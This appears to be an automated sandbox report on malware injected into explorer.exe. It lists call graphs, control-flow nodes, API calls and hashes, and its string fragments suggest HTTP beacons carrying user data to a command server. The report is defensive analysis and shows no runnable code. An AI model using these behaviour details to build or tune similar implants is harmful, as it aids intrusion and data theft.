13812->13813 13813->13808 13742 e90c0b9 13743 e90c1f0 13742->13743 13744 e90c0ed 13742->13744 13744->13743 13745 e90ff82 6 API calls 13744->13745 13745->13743 13861 e90e83a 13862 e90e841 13861->13862 13863 e90ff82 6 API calls 13862->13863 13865 e90e8c5 13863->13865 13864 e90e906 13865->13864 13866 e90f232 NtCreateFile 13865->13866 13866->13864 13953 e90ff7a 13955 e90ffb8 13953->13955 13954 e910022 13955->13954 13956 e90c5b2 socket 13955->13956 13957 e910081 13955->13957 13956->13957 13957->13954 13958 e910134 13957->13958 13960 e910117 getaddrinfo 13957->13960 13958->13954 13959 e90c732 connect 13958->13959 13962 e9101b2 13958->13962 13959->13962 13960->13958 13961 e90c6b2 send 13963 e910729 13961->13963 13962->13954 13962->13961 13963->13954 13964 e9107f4 setsockopt recv 13963->13964 13964->13954 13814 e9080fb 13816 e908137 13814->13816 13815 e9082d5 13816->13815 13817 e9048f2 NtProtectVirtualMemory 13816->13817 13818 e90828a 13817->13818 13819 e9048f2 NtProtectVirtualMemory 13818->13819 13822 e9082a9 13819->13822 13820 e9082cd 13821 e90b382 ObtainUserAgentString 13820->13821 13821->13815 13822->13820 13823 e9048f2 NtProtectVirtualMemory 13822->13823 13823->13820 13746 e90a8be 13747 e90a8c3 13746->13747 13748 e90a9a6 13747->13748 13749 e90a995 ObtainUserAgentString 13747->13749 13749->13748 13906 e907fbf 13908 e908016 13906->13908 13907 e9080f0 13908->13907 13911 e9048f2 NtProtectVirtualMemory 13908->13911 13912 e9080bb 13908->13912 13909 e9080e8 13910 e90b382 ObtainUserAgentString 13909->13910 13910->13907 13911->13912 13912->13909 13913 e9048f2 NtProtectVirtualMemory 13912->13913 13913->13909 13824 e909ce2 13825 e909dd9 13824->13825 13826 e90a022 13825->13826 13827 e909352 NtCreateFile 13825->13827 13828 e909f0d 13827->13828 13828->13826 13829 e909792 NtCreateFile 13828->13829 13829->13828 13830 e90c2e4 13831 e90c36f 13830->13831 13832 e90c305 13830->13832 13832->13831 13833 e90c0c2 6 API calls 13832->13833 13833->13831 13969 e906b66 13971 e906b6a 13969->13971 13970 e906cce 13971->13970 13972 e906cb5 CreateMutexExW 13971->13972 13972->13970 13750 e911aa9 13751 e911aaf 13750->13751 13754 e90c212 13751->13754 13753 e911ac7 13755 e90c237 13754->13755 13756 e90c21b 13754->13756 13755->13753 13756->13755 13758 e90c0c2 13756->13758 13759 e90c0cb 13758->13759 13761 e90c1f0 13758->13761 13760 e90ff82 6 API calls 13759->13760 13759->13761 13760->13761 13761->13755 13867 e90b22a 13868 e90b25e 13867->13868 13869 e90a8c2 ObtainUserAgentString 13868->13869 13870 e90b26b 13869->13870 13596 e910bac 13597 e910bb1 13596->13597 13630 e910bb6 13597->13630 13631 e906b72 13597->13631 13599 e910c2c 13600 e910c85 13599->13600 13602 e910c54 13599->13602 13603 e910c69 13599->13603 13599->13630 13601 e90eab2 NtProtectVirtualMemory 13600->13601 13606 e910c8d 13601->13606 13607 e90eab2 NtProtectVirtualMemory 13602->13607 13604 e910c80 13603->13604 13605 e910c6e 13603->13605 13604->13600 13609 e910c97 13604->13609 13608 e90eab2 NtProtectVirtualMemory 13605->13608 13667 e908102 13606->13667 13611 e910c5c 13607->13611 13612 e910c76 13608->13612 13613 e910c9c 13609->13613 13614 e910cbe 13609->13614 13653 e907ee2 13611->13653 13659 e907fc2 13612->13659 13635 e90eab2 13613->13635 13617 e910cc7 13614->13617 13618 e910cd9 13614->13618 13614->13630 13620 e90eab2 NtProtectVirtualMemory 13617->13620 13623 e90eab2 NtProtectVirtualMemory 13618->13623 13618->13630 13622 e910ccf 13620->13622 13677 e9082f2 13622->13677 13624 e910ce5 13623->13624 13695 e908712 13624->13695 13633 e906b93 13631->13633 13632 e906cce 13632->13599 13633->13632 13634 e906cb5 CreateMutexExW 13633->13634 13634->13632 13637 e90eadf 13635->13637 13636 e90eebc 13645 e907de2 13636->13645 13637->13636 13707 e9048f2 13637->13707 13639 e90ee5c 13640 e9048f2 NtProtectVirtualMemory 13639->13640 13641 e90ee7c 13640->13641 13642 e9048f2 NtProtectVirtualMemory 13641->13642 13643 e90ee9c 13642->13643 13644 e9048f2 NtProtectVirtualMemory 13643->13644 13644->13636 13646 e907df0 13645->13646 13648 e907ecd 13646->13648 13730 e90b382 13646->13730 13649 e904412 13648->13649 13651 e904440 13649->13651 13650 e904473 13650->13630 13651->13650 13652 e90444d CreateThread 13651->13652 13652->13630 13655 e907f06 13653->13655 13654 e907fa4 13654->13630 13655->13654 13656 e9048f2 NtProtectVirtualMemory 13655->13656 13657 e907f9c 13656->13657 13658 e90b382 ObtainUserAgentString 13657->13658 13658->13654 13661 e908016 13659->13661 13660 e9080f0 13660->13630 13661->13660 13664 e9048f2 NtProtectVirtualMemory 13661->13664 13665 e9080bb 13661->13665 13662 e9080e8 13663 e90b382 ObtainUserAgentString 13662->13663 13663->13660 13664->13665 13665->13662 13666 e9048f2 NtProtectVirtualMemory 13665->13666 13666->13662 13669 e908137 13667->13669 13668 e9082d5 13668->13630 13669->13668 13670 e9048f2 NtProtectVirtualMemory 13669->13670 13671 e90828a 13670->13671 13672 e9048f2 NtProtectVirtualMemory 13671->13672 13675 e9082a9 13672->13675 13673 e9082cd 13674 e90b382 ObtainUserAgentString 13673->13674 13674->13668 13675->13673 13676 e9048f2 NtProtectVirtualMemory 13675->13676 13676->13673 13680 e908349 13677->13680 13678 e90849f 13679 e9048f2 NtProtectVirtualMemory 13678->13679 13684 e9084c3 13678->13684 13679->13684 13680->13678 13681 e9048f2 NtProtectVirtualMemory 13680->13681 13682 e908480 13681->13682 13683 e9048f2 NtProtectVirtualMemory 13682->13683 13683->13678 13685 e9048f2 NtProtectVirtualMemory 13684->13685 13686 e908597 13684->13686 13685->13686 13687 e9048f2 NtProtectVirtualMemory 13686->13687 13688 e9085bf 13686->13688 13687->13688 13689 e9086b9 13688->13689 13693 e9048f2 NtProtectVirtualMemory 13688->13693 13690 e9086e1 13689->13690 13694 e9048f2 NtProtectVirtualMemory 13689->13694 13691 e90b382 ObtainUserAgentString 13690->13691 13692 e9086e9 13691->13692 13692->13630 13693->13689 13694->13690 13696 e908767 13695->13696 13697 e908903 13696->13697 13698 e9048f2 NtProtectVirtualMemory 13696->13698 13703 e908992 13697->13703 13705 e9048f2 NtProtectVirtualMemory 13697->13705 13699 e9088e3 13698->13699 13700 e9048f2 NtProtectVirtualMemory 13699->13700 13700->13697 13701 e9089b7 13702 e90b382 ObtainUserAgentString 13701->13702 13704 e9089bf 13702->13704 13703->13701 13706 e9048f2 NtProtectVirtualMemory 13703->13706 13704->13630 13705->13703 13706->13701 13708 e904987 13707->13708 13713 e9049b2 13708->13713 13722 e905622 13708->13722 13710 e904c0c 13710->13639 13711 e904ba2 13712 e910e12 NtProtectVirtualMemory 13711->13712 13721 e904b5b 13712->13721 13713->13710 13713->13711 13714 e904ac5 13713->13714 13726 e910e12 13714->13726 13716 e910e12 NtProtectVirtualMemory 13716->13710 13717 e904ae3 13717->13710 13718 e904b3d 13717->13718 13719 e910e12 NtProtectVirtualMemory 13717->13719 13720 e910e12 NtProtectVirtualMemory 13718->13720 13719->13718 13720->13721 13721->13710 13721->13716 13724 e90567a 13722->13724 13723 e905684 13723->13713 13724->13723 13725 e910e12 NtProtectVirtualMemory 13724->13725 13725->13724 13727 e90f942 13726->13727 13728 e910e45 NtProtectVirtualMemory 13727->13728 13729 e910e70 13728->13729 13729->13717 13731 e90b3c7 13730->13731 13734 e90b232 13731->13734 13733 e90b438 13733->13648 13735 e90b25e 13734->13735 13738 e90a8c2 13735->13738 13737 e90b26b 13737->13733 13739 e90a934 13738->13739 13740 e90a9a6 13739->13740 13741 e90a995 ObtainUserAgentString 13739->13741 13740->13737 13741->13740 13871 e90542e 13872 e90545b 13871->13872 13880 e9054c9 13871->13880 13873 e90f232 NtCreateFile 13872->13873 13872->13880 13874 e905496 13873->13874 13875 e9054c5 13874->13875 13877 e905082 NtCreateFile 13874->13877 13876 e90f232 NtCreateFile 13875->13876 13875->13880 13876->13880 13878 e9054b6 13877->13878 13878->13875 13879 e904f52 NtCreateFile 13878->13879 13879->13875 13934 e90c72e 13935 e90c788 connect 13934->13935 13936 e90c76a 13934->13936 13936->13935

                                                                                                                      Executed Functions

                                                                                                                      Function 0E90FF82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 0 e90ff82-e90ffb6 1 e90ffd6-e90ffd9 0->1 2 e90ffb8-e90ffbc 0->2 4 e9108fe-e91090c 1->4 5 e90ffdf-e90ffed 1->5 2->1 3 e90ffbe-e90ffc2 2->3 3->1 6 e90ffc4-e90ffc8 3->6 7 e90fff3-e90fff7 5->7 8 e9108f6-e9108f7 5->8 6->1 11 e90ffca-e90ffce 6->11 9 e90fff9-e90fffd 7->9 10 e90ffff-e910000 7->10 8->4 9->10 12 e91000a-e910010 9->12 10->12 11->1 13 e90ffd0-e90ffd4 11->13 14 e910012-e910020 12->14 15 e91003a-e910060 12->15 13->1 13->5 14->15 16 e910022-e910026 14->16 17 e910062-e910066 15->17 18 e910068-e91007c call e90c5b2 15->18 16->8 19 e91002c-e910035 16->19 17->18 20 e9100a8-e9100ab 17->20 22 e910081-e9100a2 18->22 19->8 23 e9100b1-e9100b8 20->23 24 e910144-e910150 20->24 22->20 26 e9108ee-e9108ef 22->26 27 e9100e2-e9100f5 23->27 28 e9100ba-e9100dc call e90f942 23->28 25 e910156-e910165 24->25 24->26 30 e910167-e910178 call e90c552 25->30 31 e91017f-e91018f 25->31 26->8 27->26 29 e9100fb-e910101 27->29 28->27 29->26 33 e910107-e910109 29->33 30->31 35 e910191-e9101ad call e90c732 31->35 36 e9101e5-e91021b 31->36 33->26 40 e91010f-e910111 33->40 47 e9101b2-e9101da 35->47 38 e91022d-e910231 36->38 39 e91021d-e91022b 36->39 44 e910233-e910245 38->44 45 e910247-e91024b 38->45 43 e91027f-e910280 39->43 40->26 46 e910117-e910132 getaddrinfo 40->46 51 e910283-e9102e0 call e910d62 call e90d482 call e90ce72 call e911002 43->51 44->43 48 e910261-e910265 45->48 49 e91024d-e91025f 45->49 46->24 50 e910134-e91013c 46->50 47->36 52 e9101dc-e9101e1 47->52 53 e910267-e91026b 48->53 54 e91026d-e910279 48->54 49->43 50->24 63 e9102e2-e9102e6 51->63 64 e9102f4-e910354 call e910d92 51->64 52->36 53->51 53->54 54->43 63->64 65 e9102e8-e9102ef call e90d042 63->65 69 e91035a-e910396 call e910d62 call e911262 call e911002 64->69 70 e91048c-e9104b8 call e910d62 call e911262 64->70 65->64 84 e910398-e9103b7 call e911262 call e911002 69->84 85 e9103bb-e9103e9 call e911262 * 2 69->85 79 e9104d9-e910590 call e911262 * 3 call e911002 * 2 call e90d482 70->79 80 e9104ba-e9104d5 70->80 109 e910595-e9105b9 call e911262 79->109 80->79 84->85 101 e910415-e91041d 85->101 102 e9103eb-e910410 call e911002 call e911262 85->102 105 e910442-e910448 101->105 106 e91041f-e910425 101->106 102->101 105->109 110 e91044e-e910456 105->110 107 e910467-e910487 call e911262 106->107 108 e910427-e91043d 106->108 107->109 108->109 120 e9105d1-e9106ad call e911262 * 7 call e911002 call e910d62 call e911002 call e90ce72 call e90d042 109->120 121 e9105bb-e9105cc call e911262 call e911002 109->121 110->109 113 e91045c-e91045d 110->113 113->107 132 e9106af-e9106b3 120->132 121->132 135 e9106b5-e9106fa call e90c382 call e90c7b2 132->135 136 e9106ff-e91072d call e90c6b2 132->136 153 e9108e6-e9108e7 135->153 144 e91075d-e910761 136->144 145 e91072f-e910735 136->145 149 e910767-e91076b 144->149 150 e91090d-e910913 144->150 145->144 148 e910737-e91074c 145->148 148->144 154 e91074e-e910754 148->154 157 e910771-e910773 149->157 158 e9108aa-e9108df call e90c7b2 149->158 155 e910779-e910784 150->155 156 e910919-e910920 150->156 153->26 154->144 163 e910756 154->163 159 e910795-e910796 155->159 160 e910786-e910793 155->160 156->160 157->155 157->158 158->153 164 e91079c-e9107a0 159->164 160->159 160->164 163->144 167 e9107b1-e9107b2 164->167 168 e9107a2-e9107af 164->168 170 e9107b8-e9107c4 167->170 168->167 168->170 173 e9107f4-e910861 setsockopt recv 170->173 174 e9107c6-e9107ef call e910d92 call e910d62 170->174 177 e9108a3-e9108a4 173->177 178 e910863 173->178 174->173 177->158 178->177 181 e910865-e91086a 178->181 181->177 184 e91086c-e910872 181->184 184->177 186 e910874-e9108a1 184->186 186->177 186->178
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: getaddrinforecvsetsockopt
                                                                                                                      • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                                                      • API String ID: 1564272048-1117930895
                                                                                                                      • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                      • Instruction ID: 81bcfce9f3f3e765d0c3276b27eb8fb67a47812ee30415e520f6a15f394f7c05
                                                                                                                      • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                      • Instruction Fuzzy Hash: 09525E30618B0C8FDB69EB68C4947E9B7E1FB94300F504A6ED49FC7186DE71A985CB81
                                                                                                                      Function 0E90F232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 299 e90f232-e90f256 300 e90f25c-e90f260 299->300 301 e90f8bd-e90f8cd 299->301 300->301 302 e90f266-e90f2a0 300->302 303 e90f2a2-e90f2a6 302->303 304 e90f2bf 302->304 303->304 305 e90f2a8-e90f2ac 303->305 306 e90f2c6 304->306 307 e90f2b4-e90f2b8 305->307 308 e90f2ae-e90f2b2 305->308 309 e90f2cb-e90f2cf 306->309 307->309 310 e90f2ba-e90f2bd 307->310 308->306 311 e90f2d1-e90f2f7 call e90f942 309->311 312 e90f2f9-e90f30b 309->312 310->309 311->312 316 e90f378 311->316 312->316 317 e90f30d-e90f332 312->317 320 e90f37a-e90f3a0 316->320 318 e90f3a1-e90f3a8 317->318 319 e90f334-e90f33b 317->319 321 e90f3d5-e90f3dc 318->321 322 e90f3aa-e90f3d3 call e90f942 318->322 323 e90f366-e90f370 319->323 324 e90f33d-e90f360 call e90f942 319->324 326 e90f410-e90f458 NtCreateFile call e90f172 321->326 327 e90f3de-e90f40a call e90f942 321->327 322->316 322->321 323->316 329 e90f372-e90f373 323->329 324->323 335 e90f45d-e90f45f 326->335 327->316 327->326 329->316 335->316 336 e90f465-e90f46d 335->336 336->316 337 e90f473-e90f476 336->337 338 e90f486-e90f48d 337->338 339 e90f478-e90f481 337->339 340 e90f4c2-e90f4ec 338->340 341 e90f48f-e90f4b8 call e90f942 338->341 339->320 347 e90f4f2-e90f4f5 340->347 348 e90f8ae-e90f8b8 340->348 341->316 346 e90f4be-e90f4bf 341->346 346->340 349 e90f604-e90f611 347->349 350 e90f4fb-e90f4fe 347->350 348->316 349->320 351 e90f500-e90f507 350->351 352 e90f55e-e90f561 350->352 355 e90f538-e90f559 351->355 356 e90f509-e90f532 call e90f942 351->356 357 e90f616-e90f619 352->357 358 e90f567-e90f572 352->358 364 e90f5e9-e90f5fa 355->364 356->316 356->355 362 e90f6b8-e90f6bb 357->362 363 e90f61f-e90f626 357->363 359 e90f5a3-e90f5a6 358->359 360 e90f574-e90f59d call e90f942 358->360 359->316 366 e90f5ac-e90f5b6 359->366 360->316 360->359 367 e90f739-e90f73c 362->367 368 e90f6bd-e90f6c4 362->368 370 e90f657-e90f66b call e910e92 363->370 371 e90f628-e90f651 call e90f942 363->371 364->349 366->316 376 e90f5bc-e90f5e6 366->376 372 e90f742-e90f749 367->372 373 e90f7c4-e90f7c7 367->373 377 e90f6f5-e90f734 368->377 378 e90f6c6-e90f6ef call e90f942 368->378 370->316 387 e90f671-e90f6b3 370->387 371->316 371->370 380 e90f77a-e90f7bf 372->380 381 e90f74b-e90f774 call e90f942 372->381 373->316 383 e90f7cd-e90f7d4 373->383 376->364 392 e90f894-e90f8a9 377->392 378->348 378->377 380->392 381->348 381->380 388 e90f7d6-e90f7f6 call e90f942 383->388 389 e90f7fc-e90f803 383->389 387->320 388->389 396 e90f805-e90f825 call e90f942 389->396 397 e90f82b-e90f835 389->397 392->320 396->397 397->348 398 e90f837-e90f83e 397->398 398->348 403 e90f840-e90f886 398->403 403->392
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID: `
                                                                                                                      • API String ID: 823142352-2679148245
                                                                                                                      • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                      • Instruction ID: 5cd49ee399dbc8dcd317c5badba3e1ec6bb08a720f1164e5733bd46d27260a77
                                                                                                                      • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                      • Instruction Fuzzy Hash: 33223F70B18B099FCB69DF28C4996ADF7E1FB98301F90462ED45ED7290DB30A951CB81
                                                                                                                      Function 0E910E12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 443 e910e12-e910e6e call e90f942 NtProtectVirtualMemory 446 e910e70-e910e7c 443->446 447 e910e7d-e910e8f 443->447
                                                                                                                      APIs
                                                                                                                      • NtProtectVirtualMemory.NTDLL ref: 0E910E67
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MemoryProtectVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2706961497-0
                                                                                                                      • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                      • Instruction ID: 84a117715bd409947cf3f8e736f1f7e5d3e02214573dc7d75115e948e3eb62bd
                                                                                                                      • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                      • Instruction Fuzzy Hash: BC019230628B484F8784EF6C9484226B7E4FBD9314F000B3EA59AC3250D760D5414B42
                                                                                                                      Function 0E910E0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 448 e910e0a-e910e38 449 e910e45-e910e6e NtProtectVirtualMemory 448->449 450 e910e40 call e90f942 448->450 451 e910e70-e910e7c 449->451 452 e910e7d-e910e8f 449->452 450->449
                                                                                                                      APIs
                                                                                                                      • NtProtectVirtualMemory.NTDLL ref: 0E910E67
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MemoryProtectVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2706961497-0
                                                                                                                      • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                      • Instruction ID: f89c20ceddef718c06596207d3405d34c41c0c5ae2f843f4b3cd6f8f84dad38a
                                                                                                                      • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                      • Instruction Fuzzy Hash: 7201A73462CB884F8744EB2C94452A6B3E5FBCE314F400B7EE59AC3240DB21D5014B82
                                                                                                                      Function 0E90A8C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • ObtainUserAgentString.URLMON ref: 0E90A9A0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AgentObtainStringUser
                                                                                                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                      • API String ID: 2681117516-319646191
                                                                                                                      • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                      • Instruction ID: b2de6ae7621a3812eaf08a751012ca963c36ca0d98c4dad94877397ccea6efab
                                                                                                                      • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                      • Instruction Fuzzy Hash: 1A31DF71A14B4C8FCB04EFA8C8847EEB7E1FF98205F40062AD45ED7250DE788A45CB89
                                                                                                                      Function 0E90A8BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • ObtainUserAgentString.URLMON ref: 0E90A9A0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AgentObtainStringUser
                                                                                                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                      • API String ID: 2681117516-319646191
                                                                                                                      • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                      • Instruction ID: c2e4ae90e86fcf19aed68c4e8c9f49086013d3ba904dfeac4172c26869d58849
                                                                                                                      • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                      • Instruction Fuzzy Hash: 6321E470A10B4C8FCB04EFA9C8847EDBBE5FF98205F80466AD45AD7250DF748A45CB89
                                                                                                                      Function 0E906B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 232 e906b66-e906b68 233 e906b93-e906bb8 232->233 234 e906b6a-e906b71 232->234 236 e906bbb-e906c22 call e90d612 call e90f942 * 2 233->236 234->236 238 e906b73-e906b92 234->238 244 e906c28-e906c2b 236->244 245 e906cdc 236->245 238->233 244->245 247 e906c31-e906cb0 call e911da4 call e911022 call e9113e2 call e911022 call e9113e2 244->247 246 e906cde-e906cf6 245->246 259 e906cb5-e906cca CreateMutexExW 247->259 260 e906cce-e906cd3 259->260 260->245 261 e906cd5-e906cda 260->261 261->246
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateMutex
                                                                                                                      • String ID: .dll$el32$kern
                                                                                                                      • API String ID: 1964310414-1222553051
                                                                                                                      • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                      • Instruction ID: 97dc45a44c05e055a13b417dc6fcd018654bb5f0d3ec1d20f6182df72d3bc657
                                                                                                                      • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                      • Instruction Fuzzy Hash: 86417D70918A0C8FDB94EFA8C4947AD77E4FF98300F44467AD84EDB295DE309945CB85
                                                                                                                      Function 0E906B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateMutex
                                                                                                                      • String ID: .dll$el32$kern
                                                                                                                      • API String ID: 1964310414-1222553051
                                                                                                                      • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                      • Instruction ID: d9d1e1d2ec631d1232e5d2a6459cff824d9f46b51005a52a5a8911e1862ecaa2
                                                                                                                      • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                      • Instruction Fuzzy Hash: 93415970918A0C8FDB94EFA8C498BAD77E0FFA8300F44456AC94EDB256DE309945CB85
                                                                                                                      Function 0E90C72E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 289 e90c72e-e90c768 290 e90c788-e90c7ab connect 289->290 291 e90c76a-e90c782 call e90f942 289->291 291->290
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: connect
                                                                                                                      • String ID: conn$ect
                                                                                                                      • API String ID: 1959786783-716201944
                                                                                                                      • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                      • Instruction ID: 58ca20db5169138c79ee8ef12397fc7704613ac8e73f5caa1f4c5c7b4cc87be5
                                                                                                                      • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                      • Instruction Fuzzy Hash: 67014C30618B188FCB94EF1CE088B55B7E0EB98314F1545AAA90DCB266C674D9818BC2
                                                                                                                      Function 0E90C732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 294 e90c732-e90c768 295 e90c788-e90c7ab connect 294->295 296 e90c76a-e90c782 call e90f942 294->296 296->295
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: connect
                                                                                                                      • String ID: conn$ect
                                                                                                                      • API String ID: 1959786783-716201944
                                                                                                                      • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                      • Instruction ID: bb635a95b58e43fdfd754e84874b7c35fc12b19ee9432d147d4025251fafa7b6
                                                                                                                      • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                      • Instruction Fuzzy Hash: 83012C70618A1C8FCB94EF5CE088B55B7E0FB99314F1545AEA90DCB266CB74CD818BC2
                                                                                                                      Function 0E90C6B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

